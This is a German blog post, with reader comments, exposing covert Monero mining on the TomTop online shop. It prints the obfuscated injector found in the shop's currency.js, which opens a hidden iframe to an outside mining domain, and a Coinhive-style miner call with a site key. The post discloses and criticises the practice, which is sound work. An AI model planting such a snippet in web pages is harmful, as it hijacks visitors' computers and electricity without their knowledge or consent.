TomTop: Kryptowährung-Mining wird im Online-Shop versteckt eingesetzt

TomTop

Der China-Online-Großhandel TomTop verwendet neuerdings ein Script, mit dem Monero-Mining betrieben wird. Dieses Verfahren ist allerdings ziemlich umstritten, wenn sogar nicht ganz legal.

TomTop ist ein China-Großhandel als Online-Shop mit diversen Produkten, die selbst versendet werden. Dort bekommt man nicht nur den klassischen China-Ramsch, sondern auch „Markenprodukte“ wie die DJI Drohne.

Wer gerne auf Gadgets und/oder Ramsch steht, die aus dem Ausland kommen, wird früher oder später schon auf TomTop geraten sein. In letzter Zeit ist der Online-Shop aber auch dafür bekannt, die DJI Drohne in verschiedenen Ausführungen mittels Gutschein-Code zu einem Kampfpreis zu verkaufen.

Ich persönlich habe dort habe noch nichts bestellt, kenne aber viele, die es tun und beruflich setze ich mich auch mit dem Online-Shop viel auseinander. So ist es mittlerweile auch kein Geheimnis mehr, dass die Waren, die eigentlich verzollt werden müssen, über gewisse Länder (London/Niederlande) versendet werden, um „den Zoll zu umgehen“ oder deklarieren den Warenwert viel niedriger, als er eigentlich ist.

Gestern stolperte ich wieder auf die Webseite und musste feststellen, dass die Lüftung vom CPU-Lüfter plötzlich in die Höhe schoss. Ein Blick in den Windows Task-Manger zeigte, dass die Last des CPUs massiv anstieg. Sofort kam der Verdacht auf, dass ein Script dafür verantwortlich ist, womit Kryptowährung geschürft wird.

Es ist mittlerweile möglich, dass man mit einem Script auf einer Webseite die CPU eines Webseiten-Besuchers verwendet werden kann, um Rechenoperationen durchzuführen. Dafür erhält der Verwender des Scripts dann eine Vergütung, in der Regel in der selben Währung, wofür die Besucher die Kryptowährung schürft.

Das Problem an dieser Sache ist aber, dass die Betreiber einer Webseite sich durch diese neue Möglichkeit verleiten lässt, ungefragt die CPU des Besuchers für solche Zwecke zu missbrauchen. Nach Recherchen hin setzt TomTop genau nun diese Methode im eigenen Online-Shop ein. Jeder Besucher, der die Webseite aufruft, ruft automatisch im Browser das Script auf, womit die eigene CPU verwendet wird, um die Rechenaufgaben durchzuführen. Ungefragt.

Gerade das heimliche Schürften solcher Operationen stehen schon lange in der Kritik, weil der Besucher der Webseite in der Regel erstens nichts davon weiß und zweitens es auch noch ungefragt gemacht wird.

Meine Recherchen zeigten, dass die JavaScript-Datei „currency.js“ in der neuesten Version eben solch ein Code beinhaltet, um die Rechenoperationen anzustoßen. In dieser Datei wird ein anderer Script geladen unter der URL „https://www.datasecu.download/lot.html“, wo dann letztendlich das Mining angestoßen wird beim Besucher.

var currencyRate = new Array(); currencyRate["CNY"] = 6.65; currencyRate["USD"] = 1.0; currencyRate["EUR"] = 0.83; [...] var _0x7bc7=["iframe","setAttribute","https://www.datasecu.download/lot.html","head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x7bc7,367);var _0x5028=function(t,x){var a=_0x7bc7[t-=0];return console.log(a,t),a};a=document[_0x5028("0x0")](_0x5028("0x1")),a[_0x5028("0x2")]("src",_0x5028("0x3")),a.style.width="0px",a.style.height="1px",document[_0x5028("0x4")][_0x5028("0x5")](a);
[...] <script src="https://www.datasecu.download/mb64.js"></script> <script> var eggplant = Gurke.Anonymous('489djE22mdZ3j34vhES98tCzfVn57Wq4fA8JR6uzgHqYCfYE2nmaZxmjepwr3GQAZd3qc3imFyGPHBy4PBWLb4tc1X8ADsu',{throttle: 0.4}); eggplant.start(); </script> [...]

Das Besondere hierbei ist, dass versucht wird zu verschleiern, dass man eben einen externen Script verwendet, um Kryptowährung (Monero) zu schürfen. Desweiteren ist es noch interessant, dass der eigentliche Script hinter einer Domain steckt, die ziemlich unbekannt ist. Selbst die geläufigsten Filterlisten kennen diese Domain nicht, sodass das Script für das Schürfen nicht blockiert wird.

Im Umkehrschluss heißt das also, dass so ziemlich jeder Besucher davon betroffen ist, sofern man eben nicht JavaScript im Browser selbst deaktiviert hat oder nur auf TomTop. Selbst AdBlocker oder speziell programmierte Browser-AddOns, die das (ungefragte) Schürfen verhindern, können das nicht verhindern. Auch der in Opera im System integrierte „NoCoin“-Schutz (Mining-Schutz für Kryptowährung) ist im Selbsttest machtlos.

Laut SimilarWeb hatte der Online-Shop im letzten Monat (Februar 2018) rund zehn Millionen Besucher. Für einhundert Besucher, die durchschnittlich drei Minuten auf der Webseite verweilen und das Script entsprechend (gezwungen) am laufen hat, bekommt der Verwender des Scripts 0,000286 XMR (Moneros). Umgerechnet sind das etwa 0,02 Euro. Auf zehn Millionen Besucher sind das dementsprechend rund 2.000 Euro pro Tag, im Monat rund 69.000 Euro. Eine stolze Summe und das geht zur Last der Besucher, die durch die erhöhte CPU-Last auch entsprechend mehr Strom verbrauchen.

Nun wissen wir also, dass der China-Shop TomTop ungefragt die CPU seiner Besucher verwendet, um sich selbst zu bereichern. Die einzige Maßnahme um das zu verhindern ist, die Domain „datasecu.download“ zu blockieren. Um global Erfolg zu haben, sollten beispielsweise auch die Filterlisten die Domain auf die „Blacklist“ nehmen. Darum habe ich mich schon gekümmert.

Eine Rückmeldung von TomTop, sowie von Coinhive (realisiert das CPU-Mining) erfolgte bis heute nicht. Aufgrund dessen werde ich noch ein paar anderen Medien darauf aufmerksam machen und hoffe, dass ich damit ein Stein ins Rollen bringe, sodass das unmoralische Handeln von TomTop beendet wird. Auch wenn es letztendlich sicherlich heißen wird, dass man es nur für eine kurze Zeit in Verwendung hatte, um es zu testen oder, dass man davon gar nichts wusste.

8 Kommentare zu "TomTop: Kryptowährung-Mining wird im Online-Shop versteckt eingesetzt"

  1. Hallo,

    wie recherchiert man, welches Script im Browser diese Last verursacht? Es wird einem ja schon schwer gemacht, welcher Tab in welchem Browser zusätzliche Last verursacht (Ich habe oft Vivaldi, Opera, Firefox und Chrome parallel laufen, je nach Bedarf).

  2. Hach herrlich, danke für den beitrag. In letzter zeit nervt eh überall dieser bitcoin zeugs.

  3. Und jetzt?

  4. Also zum Mitschreiben: Tomtop nutzt ein Script, womit die Leistung des PCs genutzt wird und bekommt dafür auch noch massiv Geld? Fürs Nichtstun? Dafür muss man nur die Webseite besuchen?

    • Nunja, massiv Geld dadurch machen sie jetzt bestimmt nicht. Ist einfach ein nettes Nebeneinkommen. Man muss ja auch erstmal die zehn Millionen Besucher haben, die dann auch noch mindestens drei Minuten den Shop offen haben und allesamt einen recht akzeptablen CPU.

      Aber im Prinzip siehst du das richtig, ja. Der Besucher öffnet die Seite und der PC erledigt im Hintergrund Aufgaben zugunsten des Shops. Schließt der Besucher den Shop, beendet sich die Sache auch wieder.

  5. Wundert mich nicht wirklich. China-Shops genossen noch nie guten Ruf, der Vorfall hier unterstreicht ja letztendlich alles.

Hinterlasse einen Kommentar

E-Mail Adresse wird nicht veröffentlicht.


*